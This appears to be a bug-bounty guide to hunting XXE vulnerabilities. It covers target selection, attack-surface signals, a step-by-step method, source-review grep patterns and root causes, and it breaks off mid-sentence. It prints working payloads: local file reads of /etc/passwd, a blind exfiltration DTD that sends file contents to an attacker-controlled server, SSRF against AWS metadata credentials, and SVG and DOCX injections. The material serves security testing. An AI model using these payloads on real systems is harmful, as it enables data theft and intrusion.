Crown Jewel Targets
XXE is a critical-severity vulnerability that consistently pays at the top of bug bounty scales ($5,000–$30,000+) due to its direct path to sensitive data exfiltration and SSRF. Highest-value targets:
- Large enterprise platforms with XML-heavy backend integrations (finance, logistics, ride-sharing APIs)
- Domains with file-read capability —
/etc/passwd,/etc/shadow, internal config files, AWS metadata endpoints - Subdomains sharing backend infrastructure — one XXE endpoint can pivot to internal services across dozens of domains (as demonstrated by 26+ Uber domains via a single entry point)
- API gateways accepting XML content types — especially REST APIs that silently accept
Content-Type: application/xml - File upload features — SVG, DOCX, XLSX, PDF, PPTX parsers on the server side
- SAML/SSO endpoints — SAML assertions are XML-based and frequently vulnerable
- Office/document processing services — any feature that converts or processes user-supplied documents
Attack Surface Signals
URL Patterns
/api/v*/xml
/upload
/import
/parse
/convert
/saml/acs
/sso/saml
/feed
/rss
/sitemap
/webdav
/soap/*
/wsdl
/service.asmx
/xmlrpc
/graphql (multipart with XML)
Request/Response Headers
Content-Type: application/xml
Content-Type: text/xml
Content-Type: application/soap+xml
Content-Type: multipart/form-data ← check file upload fields
Accept: application/xml
X-Content-Type-Options: (absent — good sign of loose parsing)
JavaScript Patterns (source recon)
// Look for in JS bundles
XMLSerializer
DOMParser
parseFromString
new ActiveXObject("Microsoft.XMLDOM")
$.parseXML(
xml2js
libxmljs
lxml
Tech Stack Signals
- Java stacks: Spring, Struts, JAX-WS — default XML parsers (SAX, DOM) are XXE-vulnerable without explicit hardening
- PHP:
simplexml_load_string(),DOMDocument::loadXML()— vulnerable by default pre-PHP 8 - Python:
lxml,xml.etree(safe by default),xml.sax(unsafe) - Ruby:
Nokogiriolder versions,REXML - Node.js:
xml2js,libxmljs,fast-xml-parser(older versions) - WSDL/SOAP services: Always test — legacy XML parsing virtually guaranteed
- File parsers: Apache POI (Java), python-docx, LibreOffice integrations
Step-by-Step Hunting Methodology
-
Map every XML entry point — Use Burp Suite passive scanner to flag all requests/responses with XML content types. Also intercept JSON endpoints and manually swap
Content-Typetoapplication/xmlwith equivalent XML body. -
Identify file upload features — Upload SVG, DOCX, XLSX, and observe if the server processes/renders content. These are often XML under the hood.
-
Attempt inline XXE (classic file read) — Replace the XML body with a basic entity test payload targeting
/etc/passwdorC:\Windows\win.ini. Observe if the value is reflected in the response. -
If no reflection, pivot to Blind OOB — Set up an OOB listener (Burp Collaborator, interactsh, or a self-hosted netcat server). Inject an external entity pointing to your callback URL. Confirm DNS/HTTP hit to validate the parser is making outbound connections.
-
Escalate Blind OOB to file exfiltration — Use a two-stage payload: first entity loads local file, second entity sends it OOB via HTTP parameter or DNS exfiltration.
-
Test SSRF pivot — Point the external entity at internal network addresses (
http://169.254.169.254/latest/meta-data/,http://10.0.0.1/,http://localhost:8080/admin). Look for differences in response timing or error messages. -
Test all subdomains sharing the same backend — If one subdomain is vulnerable, enumerate and test all others systematically. Shared backend infrastructure means shared vulnerability.
-
Test parameter-level injection — Some endpoints parse only specific XML nodes. Inject entities into every element value, attribute value, and even element names.
-
Test for error-based exfiltration — If OOB is blocked, trigger XML parsing errors that include file content in the error message returned to the client.
-
Document the full impact chain — Demonstrate: file read → SSRF → internal service access → note which internal domains/IPs are reachable.
Payload & Detection Patterns
Classic In-Band File Read
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
Windows Equivalent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>
Blind OOB — DNS/HTTP Callback
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR.BURPCOLLABORATOR.net/xxe-test">
]>
<root><data>&xxe;</data></root>
Blind OOB — File Exfiltration via Parameter Entity (two-stage)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://YOUR-SERVER/evil.dtd">
%dtd;
]>
<root><data>trigger</data></root>
evil.dtd (hosted on attacker server):
<!ENTITY % all "<!ENTITY send SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%all;
SSRF via XXE (AWS Metadata)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&ssrf;</data></root>
SVG XXE (for file upload endpoints)
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg">
<text font-size="14" x="0" y="16">&xxe;</text>
</svg>
DOCX/XLSX XXE — Inject into [Content_Types].xml or word/document.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Types xmlns="..."><Default Extension="rels" ContentType="&xxe;"/></Types>
Content-Type Swap (JSON to XML)
# Original JSON request
curl -X POST https://target.com/api/endpoint \
-H "Content-Type: application/json" \
-d '{"user":"test"}'
# Converted to XML for XXE testing
curl -X POST https://target.com/api/endpoint \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://COLLABORATOR.net">]><user>&xxe;</user>'
Grep Patterns for Source Code Review
# PHP
grep -rn "simplexml_load_string\|DOMDocument\|xml_parse\|loadXML\|SimpleXMLElement" .
# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|XMLInputFactory\|TransformerFactory" .
# Python
grep -rn "lxml\|xml.sax\|parseString\|fromstring\|etree.parse" .
# Look for missing hardening
grep -rn "FEATURE_EXTERNAL_GENERAL_ENTITIES\|setExpandEntityReferences\|setFeature.*false" .
Common Root Causes
-
Default parser configurations — Java's
DocumentBuilderFactory, PHP'sDOMDocument, and Python'slxmlall support external entities by default. Developers use them without reading the security docs. -
Framework upgrades without security re-review — Older versions of Spring, Struts, and similar frameworks enabled XXE by default; developers didn't re-audit XML handling when libraries changed.
-
Hidden XML consumption — Developers accept JSON at the API layer but convert to XML internally, or use libraries (Apache POI, python-docx) to process uploads without realizing those formats are XML containers.
-
Copy-paste code from StackOverflow — XML parsing examples online rarely include entity disabling. Developers copy minimal working examples straight into production.
-
SAML/SSO library misconfigurations — SSO integrations often delegate XML parsing to third-party libraries with XXE enabled; developers assume "library handles security."
-
Testing gaps on non-primary content types — QA